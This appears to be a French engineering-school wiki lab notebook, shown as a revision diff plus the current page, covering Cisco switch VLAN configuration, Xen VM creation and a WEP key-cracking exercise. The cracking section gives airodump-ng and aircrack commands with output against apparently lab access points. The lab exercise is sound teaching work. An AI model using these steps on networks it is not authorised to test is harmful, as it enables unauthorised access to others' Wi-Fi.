Cahier 2016 groupe n°7 : Différence entre versions
(→Configuration du 6006) |
|||
Ligne 39 : | Ligne 39 : | ||
xen-create-image --hostname=Ironman --ip=193.48.57.167 --netmask=255.255.255.240 --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie | xen-create-image --hostname=Ironman --ip=193.48.57.167 --netmask=255.255.255.240 --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie | ||
--dir=/usr/local/xen --gateway=193.48.57.172 | --dir=/usr/local/xen --gateway=193.48.57.172 | ||
+ | |||
+ | ===Crackage de clé WEP=== | ||
+ | |||
+ | Afin de cracker les clés WEP, nous avons d'abord recherché toutes les points d'accès Wifi disponible autour de nous et possédant une clé WEP. | ||
+ | Pour cela, nous avons utilisé la commande : airodump-ng --encrypt wep wlan2 | ||
+ | |||
+ | On obtient l'écran suivant : | ||
+ | |||
+ | CH 12 ][ Elapsed: 0 s ][ 2016-03-31 20:22 | ||
+ | |||
+ | BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID | ||
+ | |||
+ | 04:DA:D2:CF:01:94 -74 0 0 0 -1 -1 PolytechLille | ||
+ | 04:DA:D2:9C:50:57 -62 1 6 2 2 54e. WEP WEP cracotte08 | ||
+ | 04:DA:D2:9C:50:56 -67 2 0 0 2 54e. WEP WEP cracotte07 | ||
+ | 04:DA:D2:9C:50:54 -66 1 5 2 2 54e. WEP WEP cracotte05 | ||
+ | 04:DA:D2:9C:50:52 -63 1 80 38 2 54e. WEP WEP cracotte03 | ||
+ | 04:DA:D2:9C:50:53 -61 0 24 11 2 -1 WEP WEP <length: 0> | ||
+ | 04:DA:D2:9C:50:55 -68 1 14 6 2 54e. WEP WEP cracotte06 | ||
+ | 04:DA:D2:9C:50:50 -60 0 73 35 2 -1 WEP WEP <length: 0> | ||
+ | 04:DA:D2:9C:50:51 -63 1 52 25 2 54e. WEP WEP cracotte02 | ||
+ | 44:AD:D9:5F:87:00 -42 3 1 0 3 54e. WEP WEP40 Wolverine | ||
+ | |||
+ | BSSID STATION PWR Rate Lost Frames Probe | ||
+ | |||
+ | 04:DA:D2:CF:01:94 00:0C:E7:91:C1:7D -56 1e- 1e 0 13 | ||
+ | 04:DA:D2:9C:50:57 00:0F:B5:92:22:66 -68 54e-11e 15 5 | ||
+ | 04:DA:D2:9C:50:54 00:0F:B5:92:23:74 -72 36e- 5e 0 7 | ||
+ | 04:DA:D2:9C:50:52 00:0F:B5:92:23:6A -60 54e-48e 79 81 | ||
+ | 04:DA:D2:9C:50:53 00:0F:B5:92:22:68 -64 48e-54e 111 24 | ||
+ | 04:DA:D2:9C:50:55 00:0F:B5:92:23:6B -66 0 -48e 128 13 | ||
+ | 04:DA:D2:9C:50:50 00:0F:B5:92:23:75 -62 54e-54e 92 75 | ||
+ | 04:DA:D2:9C:50:51 00:0F:B5:92:24:51 -60 48e-48e 63 53 | ||
+ | (not associated) 9C:2A:83:45:F0:2D -80 0 - 1 0 1 | ||
+ | (not associated) 8A:1B:9C:B1:EC:8C -70 0 - 1 5 2 | ||
+ | 44:AD:D9:5F:87:00 AC:5F:3E:59:90:D5 -40 0 - 1 0 2 | ||
+ | |||
+ | Nous avons choisit de cracker cracotte06. Nous avons créé un fichier de capture (.cap) ciblant cracotte06 grâce à la commande : | ||
+ | airodump-ng -w cracotte06 -c 2 --bssid 04:DA:D2:9C:50:55 wlan2 | ||
+ | |||
+ | On obtient l'écran suivant : | ||
+ | |||
+ | CH 2 ][ Elapsed: 8 s ][ 2016-03-31 20:30 | ||
+ | |||
+ | BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID | ||
+ | |||
+ | 04:DA:D2:9C:50:55 -64 0 59 770 64 2 54e. WEP WEP cracotte06 | ||
+ | |||
+ | BSSID STATION PWR Rate Lost Frames Probe | ||
+ | |||
+ | 04:DA:D2:9C:50:55 00:0F:B5:92:23:6B -68 6e-54e 5108 718 | ||
+ | |||
+ | Une fois le fichier de capture créé, nous avons exécuter la commande | ||
+ | |||
+ | aircrack cracotte06-01.cap | ||
+ | |||
+ | afin débuter le crackage de la clé WEP. | ||
+ | |||
+ | On obtient le résultat suivant en quelques minutes : | ||
+ | |||
+ | [00:01:53] Tested 279622 keys (got 31535 IVs) | ||
+ | |||
+ | KB depth byte(vote) | ||
+ | 0 0/ 1 EE(44544) A1(39936) 55(39168) BA(38400) E2(37632) | ||
+ | 1 0/ 1 EE(47872) 79(37888) 0E(37120) C0(37120) 37(36864) | ||
+ | 2 0/ 1 EE(43008) 83(40448) 2B(39680) B2(39680) 3F(38912) | ||
+ | 3 0/ 1 EE(46592) 8E(38656) 30(37888) 0A(37120) 86(37120) | ||
+ | 4 0/ 1 EE(46336) C2(39168) 5D(38912) 89(38400) 1B(38144) | ||
+ | 5 0/ 1 EE(50176) CB(41472) C5(39936) 35(39168) 3C(38656) | ||
+ | 6 0/ 1 EE(41216) 0C(39936) AB(37888) B1(37888) DE(37120) | ||
+ | 7 0/ 2 EE(41472) 38(40960) D6(39168) 9F(38400) C4(37888) | ||
+ | 8 0/ 1 EE(39936) 99(38656) 11(38400) FD(38400) E6(37632) | ||
+ | 9 0/ 3 7C(38912) 05(38400) 4C(38400) C1(38144) 22(37888) | ||
+ | 10 0/ 1 D1(38144) 42(37632) 99(37632) 9D(37632) 94(37376) | ||
+ | 11 1/ 1 A0(38912) 2B(38656) 65(37888) E8(37888) A9(37632) | ||
+ | 12 0/ 1 44(43740) 35(38548) A7(38252) 3A(37560) 88(37560) | ||
+ | |||
+ | KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44:44 ] | ||
+ | Decrypted correctly: 100% | ||
+ | |||
+ | La clé a été trouver et sa valeur est "EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44:44" |
Version du 24 octobre 2016 à 10:26
Sommaire
Cahier des charges
Mise en réseau des commutateurs 6006 en E304
Avancement du travail
Configuration du 6006
-Création de 10 VLAN (vlans 2 à 11)pour chacun des 10 groupes du TP sur les ports 4/1 à 4/10
-Création d'un VLAN (vlan 12) pour les machines virtuelles sur le port 4/11
-Création de 4 ports Trunk sur les ports 4/48, 5/48, 6/48, 7/48 pour respectivement le routeur E304, le routeur E306, le bounding linux et la borne WiFi.
La suite de commande Cisco pour configurer le vlan x avec le nome nameX est la suivante :
1 Switch-E304>enable 2 Switch-E304#vlan database 3 Switch-E304(vlan)#vlan x name nameX 4 Switch-E304(vlan)#exit
La suite de commande pour configurer le port 4/x en mode accès sur le vlan x est la suivante :
1 Switch-E304>enable 2 Switch-E304#conf t 3 Switch-E304(config)#interface GigabitEthernet 4/x 4 Switch-E304(config-if)#switchport 5 Switch-E304(config-if)#switchport access vlan x 6 Switch-E304(config-if)#no shutdown 7 Switch-E304(config-if)#end 8 Switch-E304#write memory (enregistrer la configuration)
Pour configurer les ports trunk, il suffit de remplacer la ligne 5 précédente par :
5 Switch-E304(config-if)#switchport mode trunk
Installation de xen
xen-create-image --hostname=Ironman --ip=193.48.57.167 --netmask=255.255.255.240 --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie --dir=/usr/local/xen --gateway=193.48.57.172
Crackage de clé WEP
Afin de cracker les clés WEP, nous avons d'abord recherché toutes les points d'accès Wifi disponible autour de nous et possédant une clé WEP. Pour cela, nous avons utilisé la commande : airodump-ng --encrypt wep wlan2
On obtient l'écran suivant :
CH 12 ][ Elapsed: 0 s ][ 2016-03-31 20:22 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 04:DA:D2:CF:01:94 -74 0 0 0 -1 -1 PolytechLille 04:DA:D2:9C:50:57 -62 1 6 2 2 54e. WEP WEP cracotte08 04:DA:D2:9C:50:56 -67 2 0 0 2 54e. WEP WEP cracotte07 04:DA:D2:9C:50:54 -66 1 5 2 2 54e. WEP WEP cracotte05 04:DA:D2:9C:50:52 -63 1 80 38 2 54e. WEP WEP cracotte03 04:DA:D2:9C:50:53 -61 0 24 11 2 -1 WEP WEP <length: 0> 04:DA:D2:9C:50:55 -68 1 14 6 2 54e. WEP WEP cracotte06 04:DA:D2:9C:50:50 -60 0 73 35 2 -1 WEP WEP <length: 0> 04:DA:D2:9C:50:51 -63 1 52 25 2 54e. WEP WEP cracotte02 44:AD:D9:5F:87:00 -42 3 1 0 3 54e. WEP WEP40 Wolverine BSSID STATION PWR Rate Lost Frames Probe 04:DA:D2:CF:01:94 00:0C:E7:91:C1:7D -56 1e- 1e 0 13 04:DA:D2:9C:50:57 00:0F:B5:92:22:66 -68 54e-11e 15 5 04:DA:D2:9C:50:54 00:0F:B5:92:23:74 -72 36e- 5e 0 7 04:DA:D2:9C:50:52 00:0F:B5:92:23:6A -60 54e-48e 79 81 04:DA:D2:9C:50:53 00:0F:B5:92:22:68 -64 48e-54e 111 24 04:DA:D2:9C:50:55 00:0F:B5:92:23:6B -66 0 -48e 128 13 04:DA:D2:9C:50:50 00:0F:B5:92:23:75 -62 54e-54e 92 75 04:DA:D2:9C:50:51 00:0F:B5:92:24:51 -60 48e-48e 63 53 (not associated) 9C:2A:83:45:F0:2D -80 0 - 1 0 1 (not associated) 8A:1B:9C:B1:EC:8C -70 0 - 1 5 2 44:AD:D9:5F:87:00 AC:5F:3E:59:90:D5 -40 0 - 1 0 2
Nous avons choisit de cracker cracotte06. Nous avons créé un fichier de capture (.cap) ciblant cracotte06 grâce à la commande :
airodump-ng -w cracotte06 -c 2 --bssid 04:DA:D2:9C:50:55 wlan2
On obtient l'écran suivant :
CH 2 ][ Elapsed: 8 s ][ 2016-03-31 20:30 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 04:DA:D2:9C:50:55 -64 0 59 770 64 2 54e. WEP WEP cracotte06 BSSID STATION PWR Rate Lost Frames Probe 04:DA:D2:9C:50:55 00:0F:B5:92:23:6B -68 6e-54e 5108 718
Une fois le fichier de capture créé, nous avons exécuter la commande
aircrack cracotte06-01.cap
afin débuter le crackage de la clé WEP.
On obtient le résultat suivant en quelques minutes :
[00:01:53] Tested 279622 keys (got 31535 IVs)
KB depth byte(vote) 0 0/ 1 EE(44544) A1(39936) 55(39168) BA(38400) E2(37632) 1 0/ 1 EE(47872) 79(37888) 0E(37120) C0(37120) 37(36864) 2 0/ 1 EE(43008) 83(40448) 2B(39680) B2(39680) 3F(38912) 3 0/ 1 EE(46592) 8E(38656) 30(37888) 0A(37120) 86(37120) 4 0/ 1 EE(46336) C2(39168) 5D(38912) 89(38400) 1B(38144) 5 0/ 1 EE(50176) CB(41472) C5(39936) 35(39168) 3C(38656) 6 0/ 1 EE(41216) 0C(39936) AB(37888) B1(37888) DE(37120) 7 0/ 2 EE(41472) 38(40960) D6(39168) 9F(38400) C4(37888) 8 0/ 1 EE(39936) 99(38656) 11(38400) FD(38400) E6(37632) 9 0/ 3 7C(38912) 05(38400) 4C(38400) C1(38144) 22(37888) 10 0/ 1 D1(38144) 42(37632) 99(37632) 9D(37632) 94(37376) 11 1/ 1 A0(38912) 2B(38656) 65(37888) E8(37888) A9(37632) 12 0/ 1 44(43740) 35(38548) A7(38252) 3A(37560) 88(37560)
KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44:44 ]
Decrypted correctly: 100%
La clé a été trouver et sa valeur est "EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44:44"